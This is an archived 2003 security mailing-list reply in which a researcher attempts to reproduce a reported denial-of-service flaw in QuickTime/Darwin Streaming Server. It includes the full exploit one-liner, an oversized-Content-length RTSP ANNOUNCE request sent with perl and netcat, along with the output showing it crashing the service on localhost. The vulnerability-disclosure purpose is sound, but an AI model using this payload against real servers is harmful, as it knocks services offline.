Re: QuickTime/Darwin Streaming Server security issues

From: Joe Testa (Joe_Testa_at_rapid7.com)
Date: 05/23/03

  • Next message: D4rkGr3y: "ST FTP Service v3.0: directory traversal"
    To: full-disclosure@lists.netsys.com, mordred@s-mail.com, bugtraq@securityfocus.com
    Date: Fri, 23 May 2003 10:38:52 -0400
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Greetings.

        I'm having trouble reproducing this vulnerability as well. See below:

    [jdog@wonderland jdog]$ cat /etc/redhat-release
    jdog's Super Tricked-out Red Hat Linux release 8.0 (Psyche)
    [jdog@wonderland jdog]$ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc
    localhost 554
    RTSP/1.0 200 OK
    Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
    Cseq: 1
    Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE, SET_PARAMETER, RECORD

        It takes a few tries against *localhost* to notice the adverse effects:

    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v localhost 554
    localhost.localdomain [127.0.0.1] 554 (rtsp) open
    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v localhost 554
    localhost.localdomain [127.0.0.1] 554 (rtsp) open
    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v localhost 554
    localhost.localdomain [127.0.0.1] 554 (rtsp) open
    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v localhost 554
    localhost.localdomain [127.0.0.1] 554 (rtsp) open
    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v localhost 554
    localhost.localdomain [127.0.0.1] 554 (rtsp) : Connection refused

        However, the port always remains open when I use the external IP address,
    no matter how many times I run the example exploit:

    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v 192.168.x.x 554
    192.168.x.x: inverse host lookup failed: Unknown host
    (UNKNOWN) [192.168.x.x] 554 (rtsp) open
    RTSP/1.0 401 Unauthorized
    Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
    Cseq:
    WWW-Authenticate: Digest realm="Streaming Server", nonce="a4a1975c2b5c8e3fa
    557e1f3d486e5a1"

    RTSP/1.0 400 Bad Request
    Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
    Cseq:
    Connection: Close

     punt!
    [jdog@wonderland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
    length:4294967295\n\n", "A"x8192' | nc -v 192.168.x.x 554
    192.168.x.x: inverse host lookup failed: Unknown host
    (UNKNOWN) [192.168.x.x] 554 (rtsp) open
    RTSP/1.0 401 Unauthorized
    Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
    Cseq:
    WWW-Authenticate: Digest realm="Streaming Server", nonce="eb9cc1d1fb4674ad
    f37cef319d38fc4d"

    RTSP/1.0 400 Bad Request
    Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
    Cseq:
    Connection: Close

     punt!
    [jdog@wonderland jdog]$

        So, given the exploit code given in the original advisory for this issue,
    it appears as though Quicktime Streaming Server is only vulnerable from
    localhost.
        Perhaps this was the trouble Apple was having? Or am I missing something
    also?

        - Joe

    P.S. Read my blog!: http://curseddestiny.blogspot.com/

        - Joe Testa, Rapid 7, Inc.
        http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xC6E50EDC
        3691 6B1D 4813 DEA2 D18C 202D 0563 DB41 C6E5 0EDC

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.2 (OpenVMS)

    iD8DBQE+ziz1BWPbQcblDtwRAoDPAKDJ/Mmwi1QOJvaGgcVN0h1XeywkQQCglgs2
    MzpK6ok04PtnuRscEXlVe3M=
    =H0M8
    -----END PGP SIGNATURE-----


  • Next message: D4rkGr3y: "ST FTP Service v3.0: directory traversal"

    Relevant Pages